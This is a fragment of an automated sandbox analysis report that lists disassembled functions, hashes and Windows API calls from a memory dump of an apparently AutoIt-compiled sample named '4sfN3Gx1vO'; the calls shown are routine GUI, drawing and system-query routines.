                                                • Opcode Fuzzy Hash: d770ef0d9a7176a2467d92ad6cdde11272bfe1d777bf8cdb7839571a0c374b85
                                                • Instruction Fuzzy Hash: 5E02E8B1E00206EBDB05DF64D896AADBFB5FF44300F11856AE816DB291E731EE54CB81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                • Instruction ID: 776d4bfb39ffbb146dbfbe42a2817ca310806dc6a39976d7a32dd73c1ccdbdd8
                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                • Instruction Fuzzy Hash: C99178732084A34ADB69463E857407EFFE17A923A1B1A0B9DD4F2CB1C5FE24C954E724
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                • Instruction ID: 7b77afa1755ae17b678c8bd0505fc09574663a2bd1a061a7bc7b46bc2d8ed6bc
                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                • Instruction Fuzzy Hash: AF9145732098E34EDB2D467A857403EFFE16A923A2B1A079DD4F2CB1C1FE14C964D624
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3209de6a0479d8c7121cce61d4ff15b729cf2cde7c9c6418e444edb62aa39ce3
                                                • Instruction ID: 50b5a69be44266dd7199e9a4bae3124cc82c5a7c218cc410244de98d72f1e9bc
                                                • Opcode Fuzzy Hash: 3209de6a0479d8c7121cce61d4ff15b729cf2cde7c9c6418e444edb62aa39ce3
                                                • Instruction Fuzzy Hash: 2F612AF1E0874E66DA785A2849B5BBEAFA4FF8D700F140D19F843DB281E6119E41C355
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                • Instruction ID: 9127fcd35deeb4ff7a40335f90b528e0281608f6d0aa8d038872b92310812c53
                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                • Instruction Fuzzy Hash: E98188336094A34DDB6D863A853453EFFE17A923A1B1E079DD4F2CB1C1EE24C554D628
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 00592B30
                                                • DeleteObject.GDI32(00000000), ref: 00592B43
                                                • DestroyWindow.USER32 ref: 00592B52
                                                • GetDesktopWindow.USER32 ref: 00592B6D
                                                • GetWindowRect.USER32(00000000), ref: 00592B74
                                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00592CA3
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00592CB1
                                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592CF8
                                                • GetClientRect.USER32(00000000,?), ref: 00592D04
                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00592D40
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D62
                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D75
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D80
                                                • GlobalLock.KERNEL32(00000000), ref: 00592D89
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D98
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00592DA1
                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592DA8
                                                • GlobalFree.KERNEL32(00000000), ref: 00592DB3
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592DC5
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,005AFC38,00000000), ref: 00592DDB
                                                • GlobalFree.KERNEL32(00000000), ref: 00592DEB
                                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00592E11
                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00592E30
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592E52
                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0059303F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                • String ID: $AutoIt v3$DISPLAY$static
                                                • API String ID: 2211948467-2373415609
                                                • Opcode ID: a0d8ee3343bf5e662cf8efd1b1dad136db9ec5ae20eea3d995f91820ea175789
                                                • Instruction ID: a658e8566bcbc5b811fbe4d2704be4992c5475ad60fac345de20c93da84dea2f
                                                • Opcode Fuzzy Hash: a0d8ee3343bf5e662cf8efd1b1dad136db9ec5ae20eea3d995f91820ea175789
                                                • Instruction Fuzzy Hash: 75027A71A00209AFDB14DF68CC89EAE7FB9FF49310F008558F915AB2A1DB74AD45DB60
                                                APIs
                                                • SetTextColor.GDI32(?,00000000), ref: 005A712F
                                                • GetSysColorBrush.USER32(0000000F), ref: 005A7160
                                                • GetSysColor.USER32(0000000F), ref: 005A716C
                                                • SetBkColor.GDI32(?,000000FF), ref: 005A7186
                                                • SelectObject.GDI32(?,?), ref: 005A7195
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 005A71C0
                                                • GetSysColor.USER32(00000010), ref: 005A71C8
                                                • CreateSolidBrush.GDI32(00000000), ref: 005A71CF
                                                • FrameRect.USER32(?,?,00000000), ref: 005A71DE
                                                • DeleteObject.GDI32(00000000), ref: 005A71E5
                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 005A7230
                                                • FillRect.USER32(?,?,?), ref: 005A7262
                                                • GetWindowLongW.USER32(?,000000F0), ref: 005A7284
                                                  • Part of subcall function 005A73E8: GetSysColor.USER32(00000012), ref: 005A7421
                                                  • Part of subcall function 005A73E8: SetTextColor.GDI32(?,?), ref: 005A7425
                                                  • Part of subcall function 005A73E8: GetSysColorBrush.USER32(0000000F), ref: 005A743B
                                                  • Part of subcall function 005A73E8: GetSysColor.USER32(0000000F), ref: 005A7446
                                                  • Part of subcall function 005A73E8: GetSysColor.USER32(00000011), ref: 005A7463
                                                  • Part of subcall function 005A73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 005A7471
                                                  • Part of subcall function 005A73E8: SelectObject.GDI32(?,00000000), ref: 005A7482
                                                  • Part of subcall function 005A73E8: SetBkColor.GDI32(?,00000000), ref: 005A748B
                                                  • Part of subcall function 005A73E8: SelectObject.GDI32(?,?), ref: 005A7498
                                                  • Part of subcall function 005A73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 005A74B7
                                                  • Part of subcall function 005A73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005A74CE
                                                  • Part of subcall function 005A73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 005A74DB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                • String ID:
                                                • API String ID: 4124339563-0
                                                • Opcode ID: 7d2662fc6c75d5dbd695689becbd05c487dc761a8db31f03dbda7c2543cb19fb
                                                • Instruction ID: 9e0bcbd9bb9c35c7f9045a8e5b9d3a3e4844c77660121f3b47190b4ba9668048
                                                • Opcode Fuzzy Hash: 7d2662fc6c75d5dbd695689becbd05c487dc761a8db31f03dbda7c2543cb19fb
                                                • Instruction Fuzzy Hash: 96A19C72508305AFDB009F60DC48A6FBFE9FF9E320F100A19FA62961A1D730E948DB51
                                                APIs
                                                • DestroyWindow.USER32(?,?), ref: 00528E14
                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00566AC5
                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00566AFE
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00566F43
                                                  • Part of subcall function 00528F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00528BE8,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 00528FC5
                                                • SendMessageW.USER32(?,00001053), ref: 00566F7F
                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00566F96
                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00566FAC
                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00566FB7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                • String ID: 0
                                                • API String ID: 2760611726-4108050209
                                                • Opcode ID: c86afaa39f83b6e2f73581394125333b95f84c4efadbc434a888d0b833933765
                                                • Instruction ID: f4de8b26466931e39962bd73c3442262321286c3043d3a9156dd4324a2c4ea55
                                                • Opcode Fuzzy Hash: c86afaa39f83b6e2f73581394125333b95f84c4efadbc434a888d0b833933765
                                                • Instruction Fuzzy Hash: 0C129B30601651EFDB25CF14D888BBABFE9FF5A300F144569E485CB2A2CB32AC55DB91
                                                APIs
                                                • DestroyWindow.USER32(00000000), ref: 0059273E
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0059286A
                                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 005928A9
                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 005928B9
                                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00592900
                                                • GetClientRect.USER32(00000000,?), ref: 0059290C
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00592955
                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00592964
                                                • GetStockObject.GDI32(00000011), ref: 00592974
                                                • SelectObject.GDI32(00000000,00000000), ref: 00592978
                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00592988
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00592991
                                                • DeleteDC.GDI32(00000000), ref: 0059299A
                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005929C6
                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 005929DD
                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00592A1D
                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00592A31
                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00592A42
                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00592A77
                                                • GetStockObject.GDI32(00000011), ref: 00592A82
                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00592A8D
                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00592A97
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                • API String ID: 2910397461-517079104
                                                • Opcode ID: 2bd84887d2d0ebc291479d75db7d456c73165498930e3a0e3cd3a44019db8e54
                                                • Instruction ID: ea1cfc400f18c441bae5644aa6780bcb876581a182681f117f3de12bcfcece12
                                                • Opcode Fuzzy Hash: 2bd84887d2d0ebc291479d75db7d456c73165498930e3a0e3cd3a44019db8e54
                                                • Instruction Fuzzy Hash: 30B14A71A00219BFEB14DFA8CC89EAE7BA9FB59710F008515F915EB290D770AD44CBA4
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 00584AED
                                                • GetDriveTypeW.KERNEL32(?,005ACB68,?,\\.\,005ACC08), ref: 00584BCA
                                                • SetErrorMode.KERNEL32(00000000,005ACB68,?,\\.\,005ACC08), ref: 00584D36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DriveType
                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                • API String ID: 2907320926-4222207086
                                                • Opcode ID: 0f675184068f30a067ee6eb4d245cfc2c0f77a0779eb0a8264397a33c53efaf3
                                                • Instruction ID: a4fe4a10574a2f80bbe6cb3e0c7aae25122c1ee87098477094d33ddda477cca2
                                                • Opcode Fuzzy Hash: 0f675184068f30a067ee6eb4d245cfc2c0f77a0779eb0a8264397a33c53efaf3
                                                • Instruction Fuzzy Hash: 9F619F306052079BCB24FF28DA859A8BFB5BB44300B248817EC06BB391DB71ED42DF51
                                                APIs
                                                • GetSysColor.USER32(00000012), ref: 005A7421
                                                • SetTextColor.GDI32(?,?), ref: 005A7425
                                                • GetSysColorBrush.USER32(0000000F), ref: 005A743B
                                                • GetSysColor.USER32(0000000F), ref: 005A7446
                                                • CreateSolidBrush.GDI32(?), ref: 005A744B
                                                • GetSysColor.USER32(00000011), ref: 005A7463
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 005A7471
                                                • SelectObject.GDI32(?,00000000), ref: 005A7482
                                                • SetBkColor.GDI32(?,00000000), ref: 005A748B
                                                • SelectObject.GDI32(?,?), ref: 005A7498
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 005A74B7
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005A74CE
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 005A74DB
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005A752A
                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 005A7554
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 005A7572
                                                • DrawFocusRect.USER32(?,?), ref: 005A757D
                                                • GetSysColor.USER32(00000011), ref: 005A758E
                                                • SetTextColor.GDI32(?,00000000), ref: 005A7596
                                                • DrawTextW.USER32(?,005A70F5,000000FF,?,00000000), ref: 005A75A8
                                                • SelectObject.GDI32(?,?), ref: 005A75BF
                                                • DeleteObject.GDI32(?), ref: 005A75CA
                                                • SelectObject.GDI32(?,?), ref: 005A75D0
                                                • DeleteObject.GDI32(?), ref: 005A75D5
                                                • SetTextColor.GDI32(?,?), ref: 005A75DB
                                                • SetBkColor.GDI32(?,?), ref: 005A75E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1996641542-0
                                                • Opcode ID: 86f65d116e512241c141611f9c427f2bd52af713844a7c7dda0def17ccb5f4db
                                                • Instruction ID: fd6aa1b34001fde29dca1707c8de140ed363b044908c8989d770abc0267c3d0f
                                                • Opcode Fuzzy Hash: 86f65d116e512241c141611f9c427f2bd52af713844a7c7dda0def17ccb5f4db
                                                • Instruction Fuzzy Hash: 19614A72D04218AFDF019FA4DC49AAEBFB9FF0E320F114525F915AB2A1D7749940DB90
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 005A1128
                                                • GetDesktopWindow.USER32 ref: 005A113D
                                                • GetWindowRect.USER32(00000000), ref: 005A1144
                                                • GetWindowLongW.USER32(?,000000F0), ref: 005A1199
                                                • DestroyWindow.USER32(?), ref: 005A11B9
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005A11ED
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A120B
                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 005A121D
                                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 005A1232
                                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 005A1245
                                                • IsWindowVisible.USER32(00000000), ref: 005A12A1
                                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 005A12BC
                                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 005A12D0
                                                • GetWindowRect.USER32(00000000,?), ref: 005A12E8
                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 005A130E
                                                • GetMonitorInfoW.USER32(00000000,?), ref: 005A1328
                                                • CopyRect.USER32(?,?), ref: 005A133F
                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 005A13AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                • String ID: ($0$tooltips_class32
                                                • API String ID: 698492251-4156429822
                                                • Opcode ID: 47b56bf184305f637032142a3dcff30c7487bbed3e454ac0d3ea40623ecda33c
                                                • Instruction ID: 198b70755214fe71dde5ade3987a4bcd251b9b3215ad0fd46f9e56ff55373691
                                                • Opcode Fuzzy Hash: 47b56bf184305f637032142a3dcff30c7487bbed3e454ac0d3ea40623ecda33c
                                                • Instruction Fuzzy Hash: D9B18E71608741AFE704DF64C888BAEBFE5FF89350F008919F9999B261D731E844CB95
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 005A02E5
                                                • _wcslen.LIBCMT ref: 005A031F
                                                • _wcslen.LIBCMT ref: 005A0389
                                                • _wcslen.LIBCMT ref: 005A03F1
                                                • _wcslen.LIBCMT ref: 005A0475
                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 005A04C5
                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005A0504
                                                  • Part of subcall function 0052F9F2: _wcslen.LIBCMT ref: 0052F9FD
                                                  • Part of subcall function 0057223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00572258
                                                  • Part of subcall function 0057223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0057228A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                • API String ID: 1103490817-719923060
                                                • Opcode ID: 1fc21833fdea75421d92454de0b502d47e6d84d947715c964c0f38413dedc1f7
                                                • Instruction ID: 984c2dfb9d2ae1228b1a1d95e6a528d2329a0da863f49a3b135384f9c8660dd6
                                                • Opcode Fuzzy Hash: 1fc21833fdea75421d92454de0b502d47e6d84d947715c964c0f38413dedc1f7
                                                • Instruction Fuzzy Hash: F2E1AE312282019FCB14DF28C45496EBBE2BFCA314F14496DF8969B3A1EB30ED45CB91
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00528968
                                                • GetSystemMetrics.USER32(00000007), ref: 00528970
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0052899B
                                                • GetSystemMetrics.USER32(00000008), ref: 005289A3
                                                • GetSystemMetrics.USER32(00000004), ref: 005289C8
